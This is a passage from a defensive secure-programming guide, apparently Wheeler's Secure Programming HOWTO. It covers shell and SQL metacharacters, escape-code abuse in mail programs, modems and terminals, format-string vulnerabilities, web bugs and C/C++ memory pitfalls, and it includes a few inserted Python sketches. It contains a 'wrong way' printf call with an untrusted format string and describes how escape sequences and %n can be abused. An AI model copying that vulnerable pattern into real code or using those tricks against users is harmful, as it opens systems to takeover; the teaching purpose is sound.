of abstraction (information hiding) and reuse. The problem is that some
high-level library routines may or may not be implemented securely, and their
specifications won't tell you. Even if a particular implementation is secure,
it may not be possible to ensure that other versions of the routine will be
safe, or that the same interface will be safe on other platforms.
In the end, if your application must be secure, you must sometimes
re-implement your own versions of library routines. Basically, you have to
re-implement routines if you can't be sure that the library routines will
perform the necessary actions you require for security. Yes, in some cases
the library's implementation should be fixed, but it's your users who will be
hurt if you choose a library routine that is a security weakness. If you can, try
to use the high-level interfaces when you must re-implement something - that
way, you can switch to the high-level interface on systems where its use is
secure.
If you can, test to see if the routine is secure or not, and use it if it's
secure - ideally you can perform this test as part of compilation or
installation (e.g., as part of an ``autoconf'' script). For some conditions
this kind of run-time testing is impractical, but for other conditions, this
can eliminate many problems. If you don't want to bother to re-implement the
library, at least test to make sure it's safe and halt installation if it
isn't. That way, users will not accidentally install an insecure program and
will know what the problem is.
-----------------------------------------------------------------------------
8.2. Limit Call-outs to Valid Values
Ensure that any call out to another program only permits valid and expected
values for every parameter. This is more difficult than it sounds, because
many library calls or commands call lower-level routines in potentially
surprising ways. For example, many system calls are implemented indirectly by
calling the shell, which means that passing characters which are shell
metacharacters can have dangerous effects. So, let's discuss metacharacters.
-----------------------------------------------------------------------------
8.3. Handle Metacharacters
Many systems, such as the command line shell and SQL interpreters, have
``metacharacters'', that is, characters in their input that are not
interpreted as data. Such characters might be commands, or might delimit data from
commands or other data. If there's a language specification for that system's
interface that you're using, then it certainly has metacharacters. If your
program invokes those other systems and allows attackers to insert such
metacharacters, the usual result is that an attacker can completely control
your program.
One of the most pervasive metacharacter problems is the one involving shell
metacharacters. The standard Unix-like command shell (stored in /bin/sh)
interprets a number of characters specially. If these characters are sent to
the shell, then their special interpretation will be used unless escaped;
this fact can be used to break programs. According to the WWW Security FAQ
[Stein 1999, Q37], these metacharacters are:
+---------------------------------------------------------------------------+
|& ; ` ' \ " | * ? ~ < > ^ ( ) [ ] { } $ \n \r |
+---------------------------------------------------------------------------+
I should note that in many situations you'll also want to escape the tab and
space characters, since they (and the newline) are the default parameter
separators. The separator values can be changed by setting the IFS
environment variable, but if you can't trust the source of this variable you
should have thrown it out or reset it anyway as part of your environment
variable processing.
Unfortunately, in real life this isn't a complete list. Here are some other
characters that can be problematic:
  * '!' means ``not'' in an expression (as it does in C); if the return value
    of a program is tested, prepending ! could fool a script into thinking
    something had failed when it succeeded or vice versa. In some shells, the
    "!" also accesses the command history, which can cause real problems. In
    bash, this only occurs in interactive mode, but tcsh (a csh clone found
    in some Linux distributions) uses "!" even in scripts.
  * '#' is the comment character; all further text on the line is ignored.
  * '-' can be misinterpreted as leading an option (or, as --, disabling all
    further options). Even if it's in the ``middle'' of a filename, if it's
    preceded by what the shell considers whitespace you may have a
    problem.
  * ' ' (space), '\t' (tab), '\n' (newline), '\r' (return), '\v' (vertical
    space), '\f' (form feed), and other whitespace characters can have many
    dangerous effects. They may turn a ``single'' filename into multiple
    arguments, for example, or turn a single parameter into multiple
    parameters when stored. Newline and return have a number of additional
    dangers, for example, they can be used to create ``spoofed'' log entries
    in some programs, or inserted just before a separate command that is then
    executed (if an underlying protocol uses newlines or returns as command
    separators).
  * Other control characters (in particular, NIL) may cause problems for some
    shell implementations.
  * Depending on your usage, it's even conceivable that ``.'' (the ``run in
    current shell'' command) and ``='' (for setting variables) might be
    worrisome characters. However, any example I've found so far where these
    are issues has other (much worse) security problems.
What makes the shell metacharacters particularly pervasive is that several
important library calls, such as popen(3) and system(3), are implemented by
calling the command shell, meaning that they will be affected by shell
metacharacters too. Similarly, execlp(3) and execvp(3) may cause the shell to
be called. Many guidelines suggest avoiding popen(3), system(3), execlp(3),
and execvp(3) entirely and use execve(3) directly in C when trying to spawn a
process [Galvin 1998b]. At the least, avoid using system(3) when you can use
the execve(3); since system(3) uses the shell to expand characters, there is
more opportunity for mischief in system(3). In a similar manner the Perl and
shell backtick (`) also call a command shell; for more information on Perl
see Section 10.2.
Since SQL also has metacharacters, a similar issue revolves around calls to
SQL. When SQL metacharacters in attacker-supplied input are used to change the
meaning of a SQL command, it's often called "SQL injection". See [http://www.spidynamics.com/papers/
SQLInjectionWhitePaper.pdf] SPI Dynamic's paper ``SQL Injection: Are your Web
Applications Vulnerable?'' for further discussion on this. As discussed in
Chapter 5, define a very limited pattern and only allow data matching that
pattern to enter; if you limit your pattern to ^[0-9]$ or ^[0-9A-Za-z]*$ then
you won't have a problem. If you must handle data that may include SQL
metacharacters, a good approach is to convert it (as early as possible) to
some other encoding before storage, e.g., HTML encoding (in which case you'll
need to encode any ampersand characters too). Also, prepend and append a
quote to all user input, even if the data is numeric; that way, insertions of
white space and other kinds of data won't be as dangerous.
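The limited-pattern approach above can be sketched as follows (ours; the
function name is not from the HOWTO). Note the anchors: in Python regular
expressions a bare "$" would accept a trailing newline, so \A and \Z are the
safer choice for a security filter:

```python
# Sketch of the whitelist pattern recommended in the text.
import re

# \A and \Z anchor the entire string; "$" alone would let "abc\n" pass.
SAFE = re.compile(r"\A[0-9A-Za-z]*\Z")

def is_safe_sql_value(s):
    return bool(SAFE.match(s))

print(is_safe_sql_value("alice42"))        # True
print(is_safe_sql_value("x' OR '1'='1"))   # False
```

Where your database interface supports them, parameterized (prepared)
statements are a complementary defense, since the data never becomes part of
the SQL command text at all.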
Forgetting one of these characters can be disastrous, for example, many
programs omit backslash as a shell metacharacter [rfp 1999]. As discussed in
the Chapter 5, a recommended approach by some is to immediately escape at
least all of these characters when they are input. But again, by far and away
the best approach is to identify which characters you wish to permit, and use
a filter to only permit those characters.
A number of programs, especially those designed for human interaction, have
``escape'' codes that perform ``extra'' activities. One of the more common
(and dangerous) escape codes is one that brings up a command line. Make sure
that these ``escape'' commands can't be included (unless you're sure that the
specific command is safe). For example, many line-oriented mail programs
(such as mail or mailx) use tilde (~) as an escape character, which can then
be used to send a number of commands. As a result, apparently-innocent
commands such as ``mail admin < file-from-user'' can be used to execute
arbitrary programs. Interactive programs such as vi, emacs, and ed have
``escape'' mechanisms that allow users to run arbitrary shell commands from
their session. Always examine the documentation of programs you call to
search for escape mechanisms. It's best if you call only programs intended
for use by other programs; see Section 8.4.
The issue of avoiding escape codes even goes down to low-level hardware
components and emulators of them. Most modems implement the so-called
``Hayes'' command set. Unless the command set is disabled, inducing a delay,
the phrase ``+++'', and then another delay forces the modem to interpret any
following text as commands to the modem instead. This can be used to
implement denial-of-service attacks (by sending ``ATH0'', a hang-up command)
or even forcing a user to connect to someone else (a sophisticated attacker
could re-route a user's connection through a machine under the attacker's
control). For the specific case of modems, this is easy to counter (e.g., add
"ATS2-255" in the modem initialization string), but the general issue still
holds: if you're controlling a lower-level component, or an emulation of one,
make sure that you disable or otherwise handle any escape codes built into
them.
Many ``terminal'' interfaces implement the escape codes of ancient, long-gone
physical terminals like the VT100. These codes can be useful, for example,
for bolding characters, changing font color, or moving to a particular
location in a terminal interface. However, do not allow arbitrary untrusted
data to be sent directly to a terminal screen, because some of those codes
can cause serious problems. On some systems you can remap keys (e.g., so when
a user presses "Enter" or a function key it sends the command you want them
to run). On some you can even send codes to clear the screen, display a set
of commands you'd like the victim to run, and then send that set ``back'',
forcing the victim to run the commands of the attacker's choosing without
even waiting for a keystroke. This is typically implemented using ``page-mode
buffering''. This security problem is why emulated tty's (represented as
device files, usually in /dev/) should only be writeable by their owners and
never anyone else - they should never have ``other write'' permission set,
and unless only the user is a member of the group (i.e., the ``user-private
group'' scheme), the ``group write'' permission should not be set either for
the terminal [Filipski 1986]. If you're displaying data to the user at a
(simulated) terminal, you probably need to filter out all control characters
(characters with values less than 32) from data sent back to the user unless
they're identified by you as safe. If worst comes to worst, you can identify
tab and newline (and maybe carriage return) as safe, removing all the rest.
Characters with their high bits set (i.e., values greater than 127) are in
some ways trickier to handle; some old systems implement them as if they
weren't set, but simply filtering them inhibits much international use. In
this case, you need to look at the specifics of your situation.
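The control-character filter just described can be sketched as follows (ours,
not from the HOWTO). Removing ESC (character 27) is enough to defang a
terminal escape sequence; the printable remainder of the sequence is then
displayed harmlessly:

```python
# Sketch: drop characters below 32 except tab, newline, and return
# before echoing untrusted data to a (simulated) terminal.
def strip_controls(s):
    return "".join(ch for ch in s if ord(ch) >= 32 or ch in "\t\n\r")

# "\x1b[2J" is the VT100 clear-screen sequence; without ESC it is inert.
print(repr(strip_controls("safe\x1b[2Jtext\n")))
```

As the text notes, characters above 127 need a policy decision of their own;
this sketch passes them through unchanged.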
A related problem is that the NIL character (character 0) can have surprising
effects. Most C and C++ functions assume that this character marks the end of
a string, but string-handling routines in other languages (such as Perl and
Ada95) can handle strings containing NIL. Since many libraries and kernel
calls use the C convention, the result is that what is checked is not what is
actually used [rfp 1999].
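A cheap defensive measure in NIL-tolerant languages (this sketch is ours) is
to reject strings containing an embedded NIL before they reach any
C-convention interface, so the data that is checked is the data that is used:

```python
# Sketch: detect embedded NIL characters that C-convention libraries
# would silently treat as end-of-string.
def has_nul(s):
    return "\0" in s

print(has_nul("normal"))          # False
print(has_nul("evil\0hidden"))    # True
```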
When calling another program or referring to a file always specify its full
path (e.g., /usr/bin/sort). For program calls, this will eliminate possible
errors in calling the ``wrong'' command, even if the PATH value is
incorrectly set. For other file referents, this reduces problems from ``bad''
starting directories.
-----------------------------------------------------------------------------
8.4. Call Only Interfaces Intended for Programmers
Call only application programming interfaces (APIs) that are intended for use
by programs. Usually a program can invoke any other program, including those
that are really designed for human interaction. However, it's usually unwise
to invoke a program intended for human interaction in the same way a human
would. The problem is that programs' human interfaces are intentionally rich
in functionality and are often difficult to completely control. As discussed
in Section 8.3, interactive programs often have ``escape'' codes, which might
enable an attacker to perform undesirable functions. Also, interactive
programs often try to intuit the ``most likely'' defaults; this may not be
the default you were expecting, and an attacker may find a way to exploit
this.
Examples of programs you shouldn't normally call directly include mail,
mailx, ed, vi, and emacs. At the very least, don't call these without
checking their input first.
Usually there are parameters to give you safer access to the program's
functionality, or a different API or application that's intended for use by
programs; use those instead. For example, instead of invoking a text editor
to edit some text (such as ed, vi, or emacs), use sed where you can.
-----------------------------------------------------------------------------
8.5. Check All System Call Returns
Every system call that can return an error condition must have that error
condition checked. One reason is that nearly all system calls require limited
system resources, and users can often affect resources in a variety of ways.
Setuid/setgid programs can have limits set on them through calls such as
setrlimit(3) and nice(2). External users of server programs and CGI scripts
may be able to cause resource exhaustion simply by making a large number of
simultaneous requests. If the error cannot be handled gracefully, then fail
safe as discussed earlier.
-----------------------------------------------------------------------------
8.6. Avoid Using vfork(2)
The portable way to create new processes in Unix-like systems is to use the
fork(2) call. BSD introduced a variant called vfork(2) as an optimization
technique. In vfork(2), unlike fork(2), the child borrows the parent's memory
and thread of control until a call to execve(2V) or an exit occurs; the
parent process is suspended while the child is using its resources. The
rationale is that in old BSD systems, fork(2) would actually cause memory to
be copied while vfork(2) would not. Linux never had this problem; because
Linux uses copy-on-write semantics internally, Linux only copies pages when
they are changed (actually, there are still some tables that have to be copied;
in most circumstances their overhead is not significant). Nevertheless, since
some programs depend on vfork(2), recently Linux implemented the BSD vfork(2)
semantics (previously vfork(2) had been an alias for fork(2)).
There are a number of problems with vfork(2). From a portability
point-of-view, the problem with vfork(2) is that it's actually fairly tricky
for a process to not interfere with its parent, especially in high-level
languages. The ``not interfering'' requirement applies to the actual machine
code generated, and many compilers generate hidden temporaries and other code
structures that cause unintended interference. The result: programs using
vfork(2) can easily fail when the code changes or even when compiler versions
change.
For secure programs it gets worse on Linux systems, because Linux (at least
2.2 versions through 2.2.17) is vulnerable to a race condition in vfork()'s
implementation. If a privileged process uses a vfork(2)/execve(2) pair in
Linux to execute user commands, there's a race condition while the child
process is already running as the user's UID but hasn't yet entered
execve(2). The user may be able to send signals, including SIGSTOP, to this
process. Due to the semantics of vfork(2), the privileged parent process
would then be blocked as well. As a result, an unprivileged process could
cause the privileged process to halt, resulting in a denial-of-service of the
privileged process' service. FreeBSD and OpenBSD, at least, have code to
specifically deal with this case, so to my knowledge they are not vulnerable
to this problem. My thanks to Solar Designer, who noted and documented this
problem in Linux on the ``security-audit'' mailing list on October 7, 2000.
The bottom line with vfork(2) is simple: don't use vfork(2) in your programs.
This shouldn't be difficult; the primary use of vfork(2) is to support old
programs that needed vfork's semantics.
-----------------------------------------------------------------------------
8.7. Counter Web Bugs When Retrieving Embedded Content
Some data formats can embed references to content that is automatically
retrieved when the data is viewed (not waiting for a user to select it). If
it's possible to cause this data to be retrieved through the Internet (e.g.,
through the World Wide Web), then there is a potential to use this
capability to obtain information about readers without the readers'
knowledge, and in some cases to force the reader to perform activities
without the reader's consent. This privacy concern is sometimes called a
``web bug.''
In a web bug, a reference is intentionally inserted into a document and used
by the content author to track who, where, and how often a document is read.
The author can also essentially watch how a ``bugged'' document is passed
from one person to another or from one organization to another.
The HTML format has had this issue for some time. According to the [http://
www.privacyfoundation.org] Privacy Foundation:
Web bugs are used extensively today by Internet advertising companies on
Web pages and in HTML-based email messages for tracking. They are
typically 1-by-1 pixel in size to make them invisible on the screen to
disguise the fact that they are used for tracking. However, they could be
any image (using the img tag); other HTML tags that can implement web
bugs include frames, form invocations, and scripts. By itself, invoking
the web bug will provide the ``bugging'' site the reader's IP address, the
page that the reader visited, and various information about the browser;
by also using cookies it's often possible to determine the specific
identity of the reader. A survey about web bugs is available at [http://
www.securityspace.com/s_survey/data/man.200102/webbug.html] http://
www.securityspace.com/s_survey/data/man.200102/webbug.html.
What is more concerning is that other document formats seem to have such a
capability, too. When viewing HTML from a web site with a web browser, there
are other ways of getting information on who is browsing the data, but when
viewing a document in another format from an email few users expect that the
mere act of reading the document can be monitored. However, for many formats,
reading a document can be monitored. For example, it has been recently
determined that Microsoft Word can support web bugs; see [http://
www.privacyfoundation.org/advisories/advWordBugs.html] the Privacy Foundation
advisory for more information. As noted in their advisory, recent versions
of Microsoft Excel and Microsoft Power Point can also be bugged. In some
cases, cookies can be used to obtain even more information.
Web bugs are primarily an issue with the design of the file format. If your
users value their privacy, you probably will want to limit the automatic
downloading of included files. One exception might be when the file itself is
being downloaded (say, via a web browser); downloading other files from the
same location at the same time is much less likely to concern users.
-----------------------------------------------------------------------------
8.8. Hide Sensitive Information
Sensitive information should be hidden from prying eyes, both while being
input and output, and when stored in the system. Sensitive information
certainly includes credit card numbers, account balances, and home addresses,
and in many applications also includes names, email addresses, and other
private information.
Web-based applications should encrypt all communication with a user that
includes sensitive information; the usual way is to use the "https:" protocol
(HTTP on top of SSL or TLS). According to the HTTP 1.1 specification (IETF
RFC 2616 section 15.1.3), authors of services which use the HTTP protocol
should not use GET-based forms for the submission of sensitive data, because
doing so causes the data to be encoded in the Request-URI. Many existing
servers, proxies, and user agents will log the request URI in some place
where it might be visible to third parties. Instead, use POST-based
submissions, which are intended for this purpose.
Databases of such sensitive data should also be encrypted on any storage
device (such as files on a disk). Such encryption doesn't protect against an
attacker breaking the secure application, of course, since obviously the
application has to have a way to access the encrypted data too. However, it
does provide some defense against attackers who manage to get backup disks of
the data but not of the keys used to decrypt them. It also provides some
defense if an attacker doesn't manage to break into an application, but does
manage to partially break into a related system just enough to view the
stored data - again, they now have to break the encryption algorithm to get
the data. There are many circumstances where data can be transferred
unintentionally (e.g., core files), which this also prevents. It's worth
noting, however, that this is not as strong a defense as you'd think, because
often the server itself can be subverted or broken.
-----------------------------------------------------------------------------
Chapter 9. Send Information Back Judiciously
    Do not answer a fool according to his
    folly, or you will be like him
    yourself.
        Proverbs 26:4 (NIV)
-----------------------------------------------------------------------------
9.1. Minimize Feedback
Avoid giving much information to untrusted users; simply succeed or fail, and
if it fails just say it failed and minimize information on why it failed.
Save the detailed information for audit trail logs. For example:
  * If your program requires some sort of user authentication (e.g., you're
    writing a network service or login program), give the user as little
    information as possible before they authenticate. In particular, avoid
    giving away the version number of your program before authentication.
    Otherwise, if a particular version of your program is found to have a
    vulnerability, then users who don't upgrade from that version advertise
    to attackers that they are vulnerable.
  * If your program accepts a password, don't echo it back; this creates
    another way passwords can be seen.
-----------------------------------------------------------------------------
9.2. Don't Include Comments
When returning information, don't include any ``comments'' unless you're sure
you want the receiving user to be able to view them. This is a particular
problem for web applications that generate files (such as HTML). Often web
application programmers wish to comment their work (which is fine), but
instead of simply leaving the comment in their code, the comment is included
as part of the generated file (usually HTML or XML) that is returned to the
user. The trouble is that these comments sometimes provide insight into how
the system works in a way that aids attackers.
-----------------------------------------------------------------------------
9.3. Handle Full/Unresponsive Output
It may be possible for a user to clog or make unresponsive a secure program's
output channel back to that user. For example, a web browser could be
intentionally halted or have its TCP/IP channel response slowed. The secure
program should handle such cases, in particular it should release locks
quickly (preferably before replying) so that this will not create an
opportunity for a Denial-of-Service attack. Always place time-outs on
outgoing network-oriented write requests.
-----------------------------------------------------------------------------
9.4. Control Data Formatting (Format Strings/Formatation)
A number of output routines in computer languages have a parameter that
controls the generated format. In C, the most obvious example is the printf()
family of routines (including printf(), sprintf(), snprintf(), fprintf(), and
so on). Other examples in C include syslog() (which writes system log
information) and setproctitle() (which sets the string used to display
process identifier information). Many functions with names beginning with
``err'' or ``warn'', containing ``log'', or ending in ``printf'' are worth
considering. Python includes the "%" operation, which on strings controls
formatting in a similar manner. Many programs and libraries define formatting
functions, often by calling built-in routines and doing additional processing
(e.g., glib's g_snprintf() routine).
Format languages are essentially little programming languages - so developers
who let attackers control the format string are essentially running programs
written by attackers! Surprisingly, many people seem to forget the power of
these formatting capabilities, and use data from untrusted users as the
formatting parameter. The guideline here is clear - never use unfiltered data
from an untrusted user as the format parameter. Failing to follow this
guideline usually results in a format string vulnerability (also called a
formatation vulnerability). Perhaps this is best shown by example:
/* Wrong way: */
printf(string_from_untrusted_user);
/* Right ways: */
printf("%s", string_from_untrusted_user); /* safe */
fputs(string_from_untrusted_user, stdout); /* better for simple strings */
If an attacker controls the formatting information, an attacker can cause all
sorts of mischief by carefully selecting the format. The case of C's printf()
is a good example - there are lots of ways to possibly exploit
user-controlled format strings in printf(). These include buffer overruns by
creating a long formatting string (this can result in the attacker having
complete control over the program), conversion specifications that use
unpassed parameters (causing unexpected data to be inserted), and creating
formats which produce totally unanticipated result values (say by prepending
or appending awkward data, causing problems in later use). A particularly
nasty case is printf's %n conversion specification, which writes the number
of characters written so far into the pointer argument; using this, an
attacker can overwrite a value that was intended for printing! An attacker
can even overwrite almost arbitrary locations, since the attacker can specify
a ``parameter'' that wasn't actually passed. The %n conversion specification
has been a standard part of C since its beginning, is required by all C
standards, and is used by real programs. In 2000, Greg KH did a quick search
of source code and identified the programs BitchX (an irc client), Nedit (a
program editor), and SourceNavigator (a program editor / IDE / Debugger) as
using %n, and there are doubtless many more. Deprecating %n would probably be
a good idea, but even without %n there can be significant problems. Many
papers discuss these attacks in more detail, for example, you can see
Avoiding security holes when developing an application - Part 4: format
strings.
Since in many cases the results are sent back to the user, this attack can
also be used to expose internal information about the stack. This information
can then be used to circumvent stack protection systems such as StackGuard
and ProPolice; StackGuard uses constant ``canary'' values to detect attacks,
but if the stack's contents can be displayed, the current value of the canary
will be exposed, suddenly making the software vulnerable again to stack
smashing attacks.
A formatting string should almost always be a constant string, possibly
involving a function call to implement a lookup for internationalization
(e.g., via gettext's _()). Note that this lookup must be limited to values
that the program controls, i.e., the user must be allowed to only select from
the message files controlled by the program. It's possible to filter user
data before using it (e.g., by designing a filter listing legal characters
for the format string such as [A-Za-z0-9]), but it's usually better to simply
prevent the problem by using a constant format string or fputs() instead.
Note that although I've listed this as an ``output'' problem, this can cause
problems internally to a program before output (since the output routines may
be saving to a file, or even just generating internal state such as via
snprintf()).
The problem of input formatting causing security problems is not an idle
possibility; see CERT Advisory CA-2000-13 for an example of an exploit using
this weakness. For more information on how these problems can be exploited,
see Pascal Bouchareine's email article titled ``[Paper] Format bugs'',
published in the July 18, 2000 edition of [http://www.securityfocus.com]
Bugtraq. As of December 2000, developmental versions of the gcc compiler
support warning messages for insecure format string usages, in an attempt to
help developers avoid these problems.
Of course, this all begs the question as to whether or not the
internationalization lookup is, in fact, secure. If you're creating your own
internationalization lookup routines, make sure that an untrusted user can
only specify a legal locale and not something else like an arbitrary path.
Clearly, you want to limit the strings created through internationalization
to ones you can trust. Otherwise, an attacker could use this ability to
exploit the weaknesses in format strings, particularly in C/C++ programs.
This has been an item of discussion in Bugtraq (e.g., see John Levon's
Bugtraq post on July 26, 2000). For more information, see the discussion on
permitting users to only select legal language values in Section 5.8.3.
Although it's really a programming bug, it's worth mentioning that different
countries notate numbers in different ways, in particular, both the period
(.) and comma (,) are used to separate an integer from its fractional part.
If you save or load data, you need to make sure that the active locale does
not interfere with data handling. Otherwise, a French user may not be able to
exchange data with an English user, because the data stored and retrieved
will use different separators. I'm unaware of this being used as a security
problem, but it's conceivable.
-----------------------------------------------------------------------------
9.5. Control Character Encoding in Output
In general, a secure program must ensure that it synchronizes its clients to
any assumptions made by the secure program. One issue often impacting web
applications is that they forget to specify the character encoding of their
output. This isn't a problem if all data is from trusted sources, but if some
of the data is from untrusted sources, the untrusted source may sneak in data
that uses a different encoding than the one expected by the secure program.
This opens the door for a cross-site malicious content attack; see Section
5.10 for more information.
[http://www.cert.org/tech_tips/malicious_code_mitigation.html] CERT's tech
tip on malicious code mitigation explains the problem of unspecified
character encoding fairly well, so I quote it here:
Many web pages leave the character encoding ("charset" parameter in HTTP)
undefined. In earlier versions of HTML and HTTP, the character encoding
was supposed to default to ISO-8859-1 if it wasn't defined. In fact, many
browsers had a different default, so it was not possible to rely on the
default being ISO-8859-1. HTML version 4 legitimizes this - if the
character encoding isn't specified, any character encoding can be used.
If the web server doesn't specify which character encoding is in use, it
can't tell which characters are special. Web pages with unspecified
character encoding work most of the time because most character sets
assign the same characters to byte values below 128. But which of the
values above 128 are special? Some 16-bit character-encoding schemes have
additional multi-byte representations for special characters such as "<".
Some browsers recognize this alternative encoding and act on it. This is
"correct" behavior, but it makes attacks using malicious scripts much
harder to prevent. The server simply doesn't know which byte sequences
represent the special characters.
For example, UTF-7 provides alternative encoding for "<" and ">", and
several popular browsers recognize these as the start and end of a tag.
This is not a bug in those browsers. If the character encoding really is
UTF-7, then this is correct behavior. The problem is that it is possible
to get into a situation in which the browser and the server disagree on
the encoding.
Thankfully, though explaining the issue is tricky, its resolution in HTML is
easy. In the HTML header, simply specify the charset, like this example from
CERT:
<HTML>
<HEAD>
<META http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1">
<TITLE>HTML SAMPLE</TITLE>
</HEAD>
<BODY>
<P>This is a sample HTML page
</BODY>
</HTML>
From a technical standpoint, an even better approach is to set the character
encoding as part of the HTTP protocol output, though some libraries make this
more difficult. This is technically better because it doesn't force the
client to examine the header to determine a character encoding that would
enable it to read the META information in the header. Of course, in practice
a browser that couldn't read the META information given above and use it
correctly would not succeed in the marketplace, but that's a different issue.
In any case, this just means that the server would need to send, as part of
the HTTP protocol, a ``charset'' parameter with the desired value.
Unfortunately, it's
hard to heartily recommend this (technically better) approach, because some
older HTTP/1.0 clients did not deal properly with an explicit charset
parameter. Although the HTTP/1.1 specification requires clients to obey the
parameter, it's suspicious enough that you probably ought to use it as an
adjunct to forcing the use of the correct character encoding, and not your
sole mechanism.
-----------------------------------------------------------------------------
9.6. Prevent Include/Configuration File Access
When developing web based applications, do not allow users to access (read)
files such as the program include and configuration files. This data may
provide enough information (e.g., passwords) to break into the system. Note
that this guideline sometimes also applies to other kinds of applications.
There are several actions you can take to do this, including:
  * Place the include/configuration files outside of the web documentation
    root (so that the web server will never serve the files). Really, this is
    the best approach unless there's some reason the files have to be inside
    the document root.
  * Configure the web server so it will not serve include files as text. For
    example, if you're using Apache, you can add a handler or an action for
    .inc files like so:
      <Files *.inc>
        Order allow,deny
        Deny from all
      </Files>
  * Place the include files in a protected directory (using .htaccess), and
    designate them as files that won't be served.
  * Use a filter to deny access to the files. For Apache, this can be done
    using:
      <Files ~ "\.phpincludes">
        Order allow,deny
        Deny from all
      </Files>
    If you need full regular expressions to match filenames, in Apache you
    could use the FilesMatch directive.
  * If your include file is a valid script file, which your server will
    parse, make sure that it doesn't act on user-supplied parameters and that
    it's designed to be secure.
These approaches won't protect you from users who have access to the
directories your files are in if they are world-readable. You could change
the permissions of the files so that only the uid/gid of the webserver can
read these files. However, this approach won't work if the user can get the
web server to run his own scripts (the user can just write scripts to access
your files). Fundamentally, if your site is being hosted on a server shared
with untrusted people, it's harder to secure the system. One approach is to
run multiple web serving programs, each with different permissions; this
provides more security but is painful in practice. Another approach is to set
these files to be read only by your uid/gid, and have the server run scripts
at ``your'' permission. This latter approach has its own problems: it means
that certain parts of the server must have root privileges, and that the
script may have more permissions than necessary.
-----------------------------------------------------------------------------
Chapter 10. Language-Specific Issues
    Undoubtedly there are all sorts of
    languages in the world, yet none of
    them is without meaning.
        1 Corinthians 14:10 (NIV)
There are many language-specific security issues. Many of them can be
summarized as follows:
  * Turn on all relevant warnings and protection mechanisms available to you
    where practical. For compiled languages, this includes both compile-time
    mechanisms and run-time mechanisms. In general, security-relevant
    programs should compile cleanly with all warnings turned on.
  * If you can use a ``safe mode'' (e.g., a mode that limits the activities
    of the executable), do so. Many interpreted languages include such a
    mode. In general, don't depend on the safe mode to provide absolute
    protection; most languages' safe modes have not been sufficiently
    analyzed for their security, and when they are, people usually discover
    many ways to exploit them. However, by writing your code so that it's
    secure outside of safe mode, and then adding the safe mode, you end up
    with defense-in-depth (since in many cases, an attacker has to break both
    your application code and the safe mode).
  * Avoid dangerous and deprecated operations in the language. By
    ``dangerous'', I mean operations which are difficult to use correctly.
    For example, many languages include some mechanisms or functions that are
    ``magical'', that is, they try to infer the ``right'' thing to do using a
    heuristic - generally you should avoid them, because an attacker may be
    able to exploit the heuristic and do something dangerous instead of what
    was intended. A common error is an ``off-by-one'' error, in which the
    bound is off by one, and sometimes these result in exploitable errors. In
    general, write code in a way that minimizes the likelihood of off-by-one
    errors. If there are standard conventions in the language (e.g., for
    writing loops), use them.
  * Ensure that the language's infrastructure (e.g., run-time library) is
    available and secured.
  * Languages that automatically garbage-collect strings should be especially
    careful to immediately erase secret data (in particular secret keys and
    passwords).
  * Know precisely the semantics of the operations that you are using. Look
    up each operation's semantics in its documentation. Do not ignore return
    values unless you're sure they cannot be relevant. Don't ignore the
    difference between ``signed'' and ``unsigned'' values. This is
    particularly difficult in languages which don't support exceptions, like
    C, but that's the way it goes.
-----------------------------------------------------------------------------
10.1. C/C++
It is possible to develop secure code using C or C++, but both languages
include fundamental design decisions that make it more difficult to write
secure code. C and C++ easily permit buffer overflows, force programmers to
do their own memory management, and are fairly lax in their typing systems.
For systems programs (such as an operating system kernel), C and C++ are fine
choices. For applications, C and C++ are often over-used. Strongly consider
using an even higher-level language, at least for the majority of the
application. But clearly, there are many existing programs in C and C++ which
won't get completely rewritten, and many developers may choose to develop in
C and C++.
One of the biggest security problems with C and C++ programs is buffer
overflow; see Chapter 6 for more information. C has the additional weakness
of not supporting exceptions, which makes it easy to write programs that
ignore critical error situations.
Another problem with C and C++ is that developers have to do their own memory
management (e.g., using malloc(), calloc(), free(), new, and delete), and
failing to do it correctly may result in a security flaw. The more serious
problem is that programs may erroneously free memory that should not be freed
(e.g., because it's already been freed). This can result in an immediate
crash or be exploitable, allowing an attacker to cause arbitrary code to be
executed; see [Anonymous Phrack 2001]. Some systems (such as many GNU/Linux
systems) don't protect against double-freeing at all by default, and it is
not clear that those systems which attempt to protect themselves are truly
unsubvertable. Although I haven't seen anything written on the subject, I
suspect that using the incorrect call in C++ (e.g., mixing new and malloc())
could have similar effects. For example, on March 11, 2002, it was announced
that the zlib library had this problem, affecting the many programs that use
it. Thus, when testing programs on GNU/Linux, you should set the environment
variable MALLOC_CHECK_ to 1 or 2, and you might consider executing your
program with that environment variable set to each of 0, 1, and 2. The
reason for this variable is explained in the GNU/Linux malloc(3) man page:
Recent versions of Linux libc (later than 5.4.23) and GNU libc (2.x)
include a malloc implementation which is tunable via environment
variables. When MALLOC_CHECK_ is set, a special (less efficient)
implementation is used which is designed to be tolerant against simple
errors, such as double calls of free() with the same argument, or
overruns of a single byte (off-by-one bugs). Not all such errors can be
protected against, however, and memory leaks can result. If MALLOC_CHECK_
is set to 0, any detected heap corruption is silently ignored; if set to
1, a diagnostic is printed on stderr; if set to 2, abort() is called
immediately. This can be useful because otherwise a crash may happen much
later, and the true cause for the problem is then very hard to track
down.
There are various tools to deal with this, such as Electric Fence and
Valgrind; see Section 11.7 for more information. If unused memory is not
freed (e.g., using free()), that unused memory may accumulate - and if
enough unused memory can accumulate, the program may stop working. As a
result, the unused memory may be exploitable by attackers to create a denial
of service. It's theoretically possible for attackers to cause memory to be
fragmented and cause a denial of service, but usually this is a fairly
impractical and low-risk attack.
Be as strict as you reasonably can when you declare types. Where you can, use
``enum'' to define enumerated values (and not just a ``char'' or ``int'' with
special values). This is particularly useful for values in switch statements,
where the compiler can be used to determine if all legal values have been
covered. Where it's appropriate, use ``unsigned'' types if the value can't be
negative.
One complication in C and C++ is that the character type ``char'' can be
signed or unsigned (depending on the compiler and machine). When a signed
char with its high bit set is saved in an integer, the result will be a
negative number; in some cases this can be exploitable. In general, use
``unsigned char'' instead of char or signed char for buffers, pointers, and
casts when dealing with character data that may have values greater than 127
(0x7f).
C and C++ are by definition rather lax in their type-checking support, but
you can at least increase their level of checking so that some mistakes can
be detected automatically. Turn on as many compiler warnings as you can and
change the code to cleanly compile with them, and strictly use ANSI
prototypes in separate header (.h) files to ensure that all function calls
use the correct types. For C or C++ compilations using gcc, use at least the
following as compilation flags (which turn on a host of warning messages) and
try to eliminate all warnings (note that -O2 is used since some warnings can
only be detected by the data flow analysis performed at higher optimization
levels):
+---------------------------------------------------------------------------+
|gcc -Wall -Wpointer-arith -Wstrict-prototypes -O2 |
+---------------------------------------------------------------------------+
